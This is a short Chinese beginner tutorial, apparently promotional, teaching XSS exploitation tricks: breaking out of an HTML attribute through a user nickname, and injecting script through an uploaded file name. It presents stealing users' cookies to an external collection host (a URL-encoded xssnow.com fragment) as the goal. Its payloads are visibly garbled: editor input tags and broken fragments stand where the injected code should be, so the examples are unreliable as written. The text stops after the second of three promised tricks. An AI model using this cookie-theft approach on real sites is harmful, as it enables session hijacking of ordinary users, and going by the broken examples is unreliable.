零基础入门网络安全要想玩转XSS漏洞，这三个技巧你必须掌握

　　零基础入门网络安全，要想玩转XSS漏洞，这三个技巧你必须掌握。

　　XSS漏洞是一种网站应用程序的安全漏洞攻击，是代码注入的一种，具有获取用户的Cookie、修改页面信息、浏览器劫持等等危害。

　　XSS漏洞客户端脚本安全的头号大敌。今天知了堂教大家三个利用XSS漏洞的一些小技巧，希望对大家学习网络安全有所帮助。

　　技巧一：污染标签

　　简单的说，XSS漏洞的本质就是输入与输出。

　　比如，QQ网名是："你的网名">

　　结果就被污染成：<input value="" data-cke-editable="1" contenteditable="false"/>

　　这样就成功弹窗了，但又有什么用呢?

　　可以构造语句：

　　<input value="" data-cke-editable="1" contenteditable="false"/>http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22

　　这样就能成功打到cookie了。

　　技巧二：文件名称XSS

　　有些网站有上传点，但是后台并未对文件名做更改。比如上传以后前端代码是这样的：testa>

　　rar假设就是我们上传的文件。

　　是不是又可以构造语句闭合或者污染标签，值得一提的是，你需要抓包改文件名(想在Windows环境下改，你去试试就知道是怎么回事了)